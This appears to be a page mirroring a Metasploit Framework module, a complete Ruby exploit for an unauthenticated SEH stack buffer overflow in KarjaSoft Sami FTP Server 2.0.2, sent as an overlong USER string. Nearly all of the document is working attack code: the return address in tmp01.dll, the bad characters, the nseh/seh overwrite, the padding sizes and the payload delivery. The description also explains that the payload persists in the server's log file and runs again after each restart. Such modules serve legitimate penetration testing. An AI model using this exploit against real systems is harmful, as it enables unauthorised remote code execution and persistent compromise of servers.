Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/ftp/sami_ftpd_user.rb
19500 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  include Msf::Exploit::Remote::Tcp

10
  include Msf::Exploit::Remote::Seh

11
  prepend Msf::Exploit::Remote::AutoCheck

12


13
  def initialize(info = {})

14
    super(

15
      update_info(

16
        info,

17
        'Name'	=> 'KarjaSoft Sami FTP Server v2.0.2 USER Overflow',

18
        'Description'	=> %q{

19
          This module exploits an unauthenticated stack buffer overflow in

20
          KarjaSoft Sami FTP Server version 2.0.2 by sending an overly long

21
          USER string during login.

22


23
          The payload is triggered when the administrator opens the application

24
          GUI. If the GUI window is open at the time of exploitation, the

25
          payload will be executed immediately. Keep this in mind when selecting

26
          payloads. The application will crash following execution of the

27
          payload and will not restart automatically.

28


29
          When the application is restarted, it will re-execute the payload

30
          unless the payload has been manually removed from the SamiFTP.binlog

31
          log file.

32


33
          This module has been tested successfully on Sami FTP Server versions:

34
          2.0.2 on Windows XP SP0 (x86);

35
          2.0.2 on Windows 7 SP1 (x86);

36
          2.0.2 on Windows 7 SP1 (x64); and

37
          2.0.2 on Windows 10 (1909) (x64).

38
        },

39
        'Author'	=> [

40
          'Muhammad Ahmed Siddiqui', # Discovery

41
          'Critical Security', # Perl exploit

42
          'n30m1nd', # Python exploit - SEH overwrite with 2.0.2 universal tmp01.dll p/p/r

43
          'aushack', # Metasploit

44
          'bcoles' # Metasploit

45
        ],

46
        'Arch'	=> [ ARCH_X86 ],

47
        'License'	=> MSF_LICENSE,

48
        'References' => [

49
          # This vulnerability appears to have been reported multiple times.

50
          ['CVE', '2006-0441'],

51
          ['CVE', '2006-2212'],

52
          ['OSVDB', '25670'],

53
          ['BID', '16370'],

54
          ['BID', '22045'],

55
          ['BID', '17835'],

56
          ['EDB', '1448'],

57
          ['EDB', '1452'],

58
          ['EDB', '1462'],

59
          ['EDB', '3127'],

60
          ['EDB', '3140'],

61
          ['EDB', '40675']

62
        ],

63
        'DefaultOptions' => {

64
          'EXITFUNC' => 'seh'

65
        },

66
        'Platform' => ['win'],

67
        'Privileged' => false,

68
        'Payload' => {

69
          'Space'	=> 800,

70
          'BadChars' => "\x00\x0a\x0d\x20\xff",

71
          'EncoderType' => Msf::Encoder::Type::AlphanumMixed

72
        },

73
        'Targets' => [

74
          ['Sami FTP Server version 2.0.2', { 'Ret' => 0x10022ADE }], # p/p/r tmp01.dll

75
        ],

76
        'Notes' => {

77
          'Stability' => [ CRASH_SERVICE_DOWN ],

78
          'Reliability' => UNKNOWN_RELIABILITY,

79
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

80
        },

81
        'DisclosureDate' => '2006-01-24'

82
      )

83
    )

84


85
    register_options([

86
      Opt::RPORT(21)

87
    ])

88
  end

89


90
  def check

91
    connect

92
    banner = sock.get_once(-1, 3)

93
    disconnect

94


95
    unless banner.include?('Sami FTP Server')

96
      return CheckCode::Safe('Target is not Sami FTP Server')

97
    end

98


99
    if banner.include?('Sami FTP Server 2.0.2')

100
      return CheckCode::Appears('Sami FTP Server version 2.0.2.')

101
    end

102


103
    CheckCode::Detected

104
  end

105


106
  def exploit

107
    connect

108


109
    nseh = "\xeb\x06"

110
    nseh << rand_text_alpha(2)

111
    seh = [target.ret].pack('V')

112


113
    user = rand_text_alpha(596)

114
    user << nseh

115
    user << seh

116
    user << "\x90" * 10

117
    user << payload.encoded

118
    user << "\x90" * (800 - payload.encoded.length)

119


120
    print_status("Sending payload (#{user.length} bytes) ...")

121
    sock.put("USER #{user}\r\n")

122
    sock.recv(4096)

123


124
    sock.put("PASS #{Rex::Text.rand_char(payload_badchars)}\r\n")

125
    sock.recv(4096)

126


127
    handler

128
    disconnect

129
  end

130
end

131


132